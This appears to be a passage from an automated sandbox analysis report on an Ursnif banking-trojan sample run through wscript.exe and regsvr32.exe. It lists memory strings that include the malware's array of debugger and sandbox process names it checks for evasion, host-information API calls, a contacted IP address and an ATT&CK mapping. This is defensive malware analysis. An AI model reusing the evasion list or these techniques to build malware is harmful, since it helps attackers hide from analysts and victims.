            Source: wscript.exe, 00000000.00000002.842192124.00000215903B7000.00000004.00000001.sdmpBinary or memory string: SINAI = ARRAY("FRIDA-WINJECTOR-HELPER-64.EXE","FRIDA-WINJECTOR-HELPER-32.EXE","PYTHONW.EXE","PYW.EXE","CMDVIRTH.EXE","ALIVE.EXE","FILEWATCHERSERVICE.EXE","NGVMSVC.EXE","SANDBOXIERPCSS.EXE","ANALYZER.EXE","FORTITRACER.EXE","NSVERCTL.EXE","SBIECTRL.EXE","ANGAR2.EXE","GOATCASPER.EXE","OLLYDBG.EXE","SBIESVC.EXE","APIMONITOR.EXE","GOATCLIENTAPP.EXE","PEID.EXE","SCANHOST.EXE","APISPY.EXE","HIEW32.EXE","PERL.EXE","SCKTOOL.EXE","APISPY32.EXE","HOOKANAAPP.EXE","PETOOLS.EXE","SDCLT.EXE","ASURA.EXE","HOOKEXPLORER.EXE","PEXPLORER.EXE","SFTDCC.EXE","AUTOREPGUI.EXE","HTTPLOG.EXE","PING.EXE","SHUTDOWNMON.EXE","AUTORUNS.EXE","ICESWORD.EXE","PR0C3XP.EXE","SNIFFHIT.EXE","AUTORUNSC.EXE","ICLICKER-RELEASE.EXE",".EXE","PRINCE.EXE","SNOOP.EXE","AUTOSCREENSHOTTER.EXE","IDAG.EXE","PROCANALYZER.EXE","SPKRMON.EXE","AVCTESTSUITE.EXE","IDAG64.EXE","PROCESSHACKER.EXE","SYSANALYZER.EXE","AVZ.EXE","IDAQ.EXE","PROCESSMEMDUMP.EXE","SYSER.EXE","BEHAVIORDUMPER.EXE","IMMUNITYDEBUGGER.EXE","PROCEXP.EX
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: SYSER.EXE
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE@
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE@
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE@
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.770714232.00000215922DC000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXE@T
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: SANDBOXIERPCSS.EXE@V5
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: IDAG.EXET@:V
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE@B
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXEX
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.770714232.00000215922DC000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXE@K
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXEX
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-4042
            Source: C:\Windows\System32\wscript.exe TID: 5660Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007B9673 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_007B9673
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: wscript.exe, 00000000.00000002.865152129.0000021596B60000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000000.00000003.804520999.0000021593B79000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.865152129.0000021596B60000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.865152129.0000021596B60000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.865152129.0000021596B60000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10002123 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_10002123
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10035BD0 mov eax, dword ptr fs:[00000030h]3_2_10035BD0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10035B06 mov eax, dword ptr fs:[00000030h]3_2_10035B06
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10035710 push dword ptr fs:[00000030h]3_2_10035710
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10001EE4 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,3_2_10001EE4

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: pristine.diff.0.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 88.99.66.31 187Jump to behavior
            Source: regsvr32.exe, 00000002.00000002.1186882081.0000000001440000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1188285405.0000000002E50000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: regsvr32.exe, 00000002.00000002.1186882081.0000000001440000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1188285405.0000000002E50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000002.00000002.1186882081.0000000001440000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1188285405.0000000002E50000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000002.00000002.1186882081.0000000001440000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1188285405.0000000002E50000.00000002.00000001.sdmpBinary or memory string: Progmanlock

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_100021F5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007B1ACF cpuid 3_2_007B1ACF
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10002123 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_10002123
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007B1ACF wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_007B1ACF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100010C4 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_100010C4
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1174352151.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174431871.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1173725277.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174400252.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174270791.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174179348.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174074557.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1173922925.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5680, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1174352151.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174431871.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1173725277.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174400252.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174270791.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174179348.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174074557.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1173922925.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5680, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation311Winlogon Helper DLLProcess Injection12Software Packing1Credential DumpingSystem Time Discovery1Remote File Copy3Data from Local SystemData Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Replication Through Removable MediaScripting121Port MonitorsAccessibility FeaturesScripting121Network SniffingAccount Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            External Remote ServicesExecution through API1Accessibility FeaturesPath InterceptionFile Deletion1Input CaptureSecurity Software Discovery121Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Drive-by CompromiseExploitation for Client Execution1System FirmwareDLL Search Order HijackingObfuscated Files or Information2Credentials in FilesFile and Directory Discovery3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol4SIM Card SwapPremium SMS Toll Fraud
            Exploit Public-Facing ApplicationGraphical User Interface1Shortcut ModificationFile System Permissions WeaknessMasquerading11Account ManipulationSystem Information Discovery46Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion2Brute ForceVirtualization/Sandbox Evasion2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
            Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection12Two-Factor Authentication InterceptionProcess Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionDLL Side-Loading1Bash HistorySystem Owner/User Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptRemote System Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java